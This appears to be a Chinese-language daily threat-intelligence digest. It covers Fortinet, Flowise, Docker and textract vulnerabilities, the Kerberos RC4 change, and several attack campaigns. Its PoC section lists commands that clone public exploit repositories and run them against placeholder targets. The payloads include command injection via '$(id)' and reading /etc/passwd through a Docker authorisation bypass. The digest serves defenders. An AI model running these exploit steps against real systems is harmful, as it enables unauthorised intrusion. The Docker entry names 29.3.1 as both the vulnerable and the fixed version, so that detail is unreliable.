每日安全情报报告 · 2026-04-08报告时间2026年04月08日 12:49覆盖周期近48小时2026-04-06 ~ 2026-04-08今日特别关注微软 Patch Tuesday 日Kerberos RC4 强制弃用生效 FortiClient EMS 双重 RCE 在野利用 GPUBreach 全新 GPU RowHammer 权限提升风险等级说明标识级别CVSS 范围严重CVSS ≥ 9.0高危CVSS 7.0–8.9中危CVSS 4.0–6.9⭐在野利用 / CISA KEV—一、高危漏洞速报⭐ CVE-2026-35616 · Fortinet FortiClient EMS 预认证 API 绕过 → RCE字段信息漏洞类型不当访问控制Improper Access Control→ 未授权 RCE受影响组件Fortinet FortiClient Enterprise Management Server 7.4.5、7.4.6CVSS 评分9.1严重状态⭐ 在野零日利用 · Fortinet 已发布紧急热补丁 · CISA KEV 收录披露时间2026-04-04watchTowr 传感器于 2026-03-31 率先捕获漏洞描述攻击者无需任何身份验证可通过特制 API 请求绕过 FortiClient EMS 的访问控制机制直接在服务端执行任意命令或代码。watchTowr Labs 的蜜罐传感器于补丁发布前 4 天即检测到活跃利用活动当前全网暴露实例超过2,000 台正遭受持续批量扫描与利用。此漏洞与上周披露的 CVE-2026-21643FortiClient EMS SQL 注入 RCE共同构成 Fortinet 双重高危打击建议立即优先处理。修复建议立即升级至 FortiClient EMS 7.4.7 或应用官方紧急热补丁。参考链接- Fortinet 官方安全公告- The Hacker News 报道- watchTowr Labs 分析- NVD 详情⭐ CVE-2026-21643 · Fortinet FortiClient EMS SQL 注入 → 未授权 RCE字段信息漏洞类型SQL 注入Unauthenticated SQL Injection→ RCE受影响组件Fortinet FortiClient EMS 7.4.4 及以下版本CVSS 评分9.8严重状态⭐ 在野利用已确认 · CISA KEV 收录披露时间2026-03-29360 漏洞研究院披露漏洞描述攻击者可通过在 HTTP 请求Site头中注入未经净化的恶意 SQL 语句在无需认证的情况下对 FortiClient EMS 数据库执行任意操作并进一步实现远程代码执行。受影响版本 7.4.4 及以下建议升级至 7.4.5。与 CVE-2026-35616 联合构成两波针对同一产品的高危攻击链Fortinet 基础设施面临严重威胁。修复建议立即升级至 FortiClient EMS 7.4.5 或以上版本。参考链接- 腾讯云开发者社区分析- VulnTracker 分析报告- NVD 详情- CyberPress 报道2,000 实例暴露⭐ CVE-2025-59528 · Flowise AI 平台未授权 RCECVSS 10.0字段信息漏洞类型代码注入Code Injection→ 未授权 RCE受影响组件Flowise AI Agent Builder ≤ 3.0.5CustomMCP 节点CVSS 评分10.0满分·严重状态⭐ 正遭大规模主动利用 · 超 12,000 个暴露实例披露时间2025 年下半年官方补丁已发布 6 个月仍有实例未修复漏洞描述FlowiseGitHub 42,000 Star的 CustomMCP 节点存在严重代码注入漏洞攻击者无需任何身份验证即可向暴露的 Flowise 服务发送恶意请求在服务器上执行任意命令RCE。VulnCheck 于 2026-04-07 警告称尽管补丁已发布超过 6 个月全球仍有超过12,000 个互联网暴露实例未完成修复攻击者正在对其展开持续批量利用。此漏洞是 AI 平台安全性问题的典型警示。修复建议立即升级至 Flowise 3.0.6 版本若无法立即升级限制 Flowise 的网络访问禁止直接暴露于互联网。参考链接- CSA 实验室技术分析- FreeBuf 报道- The Hacker News 报道- NVD 详情 CVE-2026-34040 · Docker Engine AuthZ 插件授权绕过字段信息漏洞类型授权插件绕过Authorization Plugin Bypass受影响组件Docker Engine 29.3.1所有平台CVSS 评分8.8高危状态PoC 已公开 · 官方补丁已发布披露时间2026-04-07Cyera Research 发现漏洞描述此漏洞是对 CVE-2024-41110 的不完全修复。Docker Engine 在处理大于 1MB 的请求体时会静默跳过 AuthZ 授权插件的检查导致依赖请求体内容进行访问控制的授权插件完全失效。攻击者可利用此漏洞构造超过 1MB 的恶意请求绕过 AuthZ 插件的权限检查进而获取宿主机访问权限实现容器逃逸。影响范围覆盖全部使用 Docker AuthZ 插件的生产环境。修复建议立即升级 Docker Engine 至 29.3.1 版本。参考链接- Cyera Research 技术博客- Security Arsenal 详细分析- lilting.ch 技术分析- NVD 详情 微软 Patch Tuesday 4月今日生效· Kerberos RC4 弃用强制部署字段信息类型安全配置变更Breaking Change受影响系统Windows 10 / 11 及 Windows ServerActive Directory 环境生效日期2026-04-08第二阶段部署今日起强制执行状态今日 Patch Tuesday 累积更新包含 · 无 CVE 编号协议升级变更描述微软今日4 月 Patch Tuesday发布的累积更新将进入 Kerberos RC4-HMAC 弃用第二强制部署阶段。自今日起Kerberos 认证将强制使用AES-SHA1加密算法替代老旧的 RC4Rivest Cipher 4。所有仍使用 RC4 加密的服务账户、旧版 NAS 设备、打印服务器等将面临身份验证失败风险可能导致服务中断。IT 管理员需在更新前完成 RC4 → AES 迁移或将受影响设备列入豁免名单。迁移检查# 检测 AD 环境中仍使用 RC4 的账户 Get-ADUser -Filter {msDS-SupportedEncryptionTypes -band 4} -Properties msDS-SupportedEncryptionTypes | Select Name, msDS-SupportedEncryptionTypes参考链接- 微软 Windows Server 博客- ITHome 报道- 什么值得买技术解读二、漏洞 PoC 速递PoC 1 · CVE-2026-35616 · Fortinet FortiClient EMS 预认证 RCE状态⭐ 在野利用 · 公开 PoC 已在 GitHub 流传漏洞背景Fortinet FortiClient EMS 中的不当访问控制漏洞无需身份验证即可触发 RCECVSS 9.1已在野利用。利用步骤# 步骤 1克隆 PoC 仓库 git clone https://github.com/z3r0h3ro/CVE-2026-35616-poc cd CVE-2026-35616-poc # 步骤 2安装 Python 依赖 pip install -r requirements.txt # 步骤 3扫描模式检测目标是否存在漏洞 python3 exploit.py --target https://TARGET_EMS_IP --check # 步骤 4利用模式在受控靶机测试需合法授权 python3 exploit.py --target https://TARGET_EMS_IP --cmd id⚠️警告此 PoC 已被威胁行为者在野使用请勿在未授权目标上运行。仅用于授权的安全测试与防御验证。参考链接- GitHub PoC 仓库- thecyberthrone 技术分析- NVD 详情PoC 2 · CVE-2025-59528 · Flowise AI CustomMCP 节点代码注入 RCE状态⭐ 正遭大规模利用 · Nuclei YAML 模板已公开漏洞背景Flowise 开源 AI 工作流平台 CustomMCP 节点代码注入CVSS 10.012,000 暴露实例。利用步骤# 步骤 1使用 Nuclei 模板扫描暴露的 Flowise 实例 git clone https://github.com/zimshk/CVE-2025-59528.yaml cd CVE-2025-59528.yaml # 步骤 2安装 Nuclei如未安装 go install -v github.com/projectdiscovery/nuclei/v3/cmd/nucleilatest # 步骤 3执行漏洞扫描检测模式 nuclei -t CVE-2025-59528.yaml -target http://TARGET_FLOWISE_URL # 步骤 4批量扫描结合资产列表 nuclei -t CVE-2025-59528.yaml -list flowise_targets.txt -o results.txt⚠️警告此漏洞 CVSS 满分10.0利用门槛极低请立即修复或隔离暴露实例切勿在未授权目标上运行扫描脚本。参考链接- GitHub Nuclei 模板- FreeBuf 漏洞分析- CSA 活跃利用研究报告PoC 3 · CVE-2026-34040 · Docker Engine AuthZ 插件绕过1MB 请求体状态PoC 已公开 · 已有详细技术分析 · 暂未发现在野利用漏洞背景Docker Engine AuthZ 授权插件绕过CVSS 8.8CVE-2024-41110 修复不完整。利用步骤# 步骤 1克隆利用验证脚本 git clone https://github.com/delimiter-online/CVE-2026-34040-PoC cd CVE-2026-34040-PoC # 步骤 2安装依赖 pip install requests # 步骤 3生成一个超过 1MB 的 Docker API 请求以绕过 AuthZ 检查 # 核心原理请求体 1MB 时 AuthZ 插件被静默跳过 python3 poc.py --docker-socket unix:///var/run/docker.sock \ --target-container victim_container \ --payload ls -la /etc/passwd # 步骤 4检测环境是否存在漏洞 docker version | grep -i Engine # 若 Engine 版本 29.3.1 则存在漏洞⚠️警告此漏洞可导致容器逃逸并获得宿主机权限在使用 Docker AuthZ 插件的生产环境中风险极高。参考链接- Cyera Research 发现报告- delimiter.online 技术分析- NVD 详情PoC 4 · CVE-2026-26831 · textract npm 包操作系统命令注入状态PoC 已公开 · GitHub 多个利用脚本流传漏洞背景textractNode.js 文档内容提取 npm 包≤ 2.5.0 版本存在 OS 命令注入漏洞CVSS 9.8。利用步骤# 步骤 1克隆 PoC git clone https://github.com/zebbernCVE/CVE-2026-26831 cd CVE-2026-26831 # 步骤 2安装依赖 npm install # 步骤 3运行漏洞验证需访问已安装 textract ≤ 2.5.0 的 Node.js 服务 node exploit.js --target http://TARGET_URL/upload --payload $(id) # 步骤 4检查本地 npm 项目是否受影响 npm list textract # 若版本 ≤ 2.5.0立即执行npm update textract参考链接- GitHub PoC 仓库- tonyharris.io PoC Week 汇总- NVD 详情三、安全动态与研究文章 1. GPUBreach首个基于 GDDR6 RowHammer 的 GPU 权限完全提升攻击来源gpubreach.ca / FreeBuf / ITHome2026-04-08摘要研究人员于今日4 月 8 日公开了名为GPUBreach的新型攻击技术这是史上首个利用 GPU GDDR6 内存 RowHammer 漏洞实现完整 CPU 权限提升的攻击方案。攻击者无需物理接触通过在 CUDA 内核中触发 GDDR6 内存位翻转Bit Flip破坏 GPU 页表条目进而在 GPU 侧实现任意内存写入最终横向攻破 CPU 并获得 root/SYSTEM 权限。研究同期披露的相关技术还有 GDDRHammer 和 GeForge均围绕 GDDR6 RowHammer 场景。攻击影响搭载 NVIDIA RTX 40/30 系列 GPU 的服务器与工作站目前尚无通用缓解补丁底层为硬件级设计缺陷。关键词RowHammer · GDDR6 · GPU 安全 · 侧信道攻击 · NVIDIA参考链接- GPUBreach 官方研究站- FreeBuf 详细技术分析- ITHome 报道 2. APT28Forest BlizzardSOHOStorm 行动全球 SOHO 路由器 DNS 劫持间谍活动来源The Hacker News / APT28 报告2026-04-07/08摘要俄罗斯国家级 APT 组织APT28Forest Blizzard / Fancy Bear自 2025 年 5 月起持续运营一项代号为SOHOStorm的大规模 DNS 劫持行动。该组织通过利用MikroTik和TP-LinkWR841N路由器中的已知身份验证绕过漏洞将数千台 SOHO 路由器改造为恶意 DNS 基础设施对目标受害者实施中间人AiTM攻击窃取凭证并开展网络间谍活动。受害者集中于欧洲和北美的政府、国防、能源等关键部门。防御建议立即更新 SOHO 路由器固件、关闭远程管理接口、启用强身份验证。参考链接- The Hacker News 详细报道- IPLogger APT28 行动分析- Anavem 新闻摘要 3. 伊朗黑客集团大规模攻击美国关键基础设施 OT 设备来源The Hacker News2026-04-08摘要美国网络安全机构 CISA 与 FBI 于今日4 月 8 日联合发布警告伊朗关联威胁行为者正在针对美国关键基础设施能源、水处理、制造中暴露于互联网的操作技术OT设备发起持续攻击包括可编程逻辑控制器PLC和人机界面HMI。攻击者利用默认凭据和已知漏洞入侵设备导致系统功能受损和运营中断部分设施已报告生产中断事故。此次活动与伊朗 IRGC 关联组织相关是近期针对工业控制系统ICS攻击大幅升级的最新案例。参考链接- The Hacker News 报道- CISA 官方公告 4. Storm-1175中国背景持续利用零日 N 日漏洞部署 Medusa 勒索软件来源The Hacker News / Microsoft MSTIC2026-04-07摘要微软威胁情报中心MSTIC持续追踪的Storm-1175与中国存在关联在 2026 年一季度明显提升活动强度该组织结合零日漏洞与未及时修复的 N 日漏洞快速入侵医疗、教育、金融行业目标系统并部署Medusa 勒索软件实施勒索攻击。微软在报告中特别指出该组织的初始访问速度漏洞公开后 24-72 小时内即开始利用远超行业平均水平是典型的漏洞武器化竞赛案例。参考链接- The Hacker News 报道- Microsoft MSTIC 报告 5. 1,000 个 ComfyUI 暴露实例遭劫持用于挖矿与代理僵尸网络来源The Hacker News2026-04-07摘要攻击者正在大规模利用暴露于互联网的ComfyUI开源 AI 图像生成工作流平台实例将其劫持为加密货币挖矿节点和 SOCKS 代理僵尸网络成员。目前全球已有超过1,000 个实例被入侵攻击者利用 ComfyUI 自定义节点功能执行恶意 Python 代码无需利用特定 CVE。此案例再次印证 AI 工具平台安全管理疏漏带来的严重风险——默认无认证 暴露公网 极高风险。参考链接- The Hacker News 报道四、优先响应矩阵优先级CVE / 事件风险建议行动P0 ⭐CVE-2026-35616 FortiClient EMS在野 RCECISA KEV立即安装紧急热补丁 → 升级至 7.4.7P0 ⭐CVE-2026-21643 FortiClient EMSSQL 注入 RCE在野利用立即升级至 7.4.5P0 ⭐CVE-2025-59528 FlowiseCVSS 10.012,000 暴露立即升级 Flowise或隔离实例P1 CVE-2026-34040 Docker EngineAuthZ 绕过容器逃逸升级 Docker Engine 至 29.3.1P1 Kerberos RC4 弃用今日生效服务中断风险检查 AD 环境完成 RC4→AES 迁移P2 CVE-2026-26831 textract npmCVSS 9.8OS 命令注入npm update textractP2 APT28 SOHOStorm 行动DNS 劫持间谍更新路由器固件关闭远程管理P2 ComfyUI 暴露实例劫持挖矿/代理僵尸网络限制 ComfyUI 网络访问启用认证五、今日关键词速查CVE-2026-35616·CVE-2026-21643·CVE-2025-59528·CVE-2026-34040·CVE-2026-26831·Fortinet FortiClient EMS·Flowise AI RCE·Docker AuthZ Bypass·GPUBreach·RowHammer·APT28 SOHOStorm·Kerberos RC4 弃用·Patch Tuesday 2026-04·Storm-1175 Medusa·ComfyUI 劫持报告生成时间2026-04-08 12:49 | 数据来源The Hacker News · FreeBuf · watchTowr Labs · Cyera Research · NVD · CISA · GitHub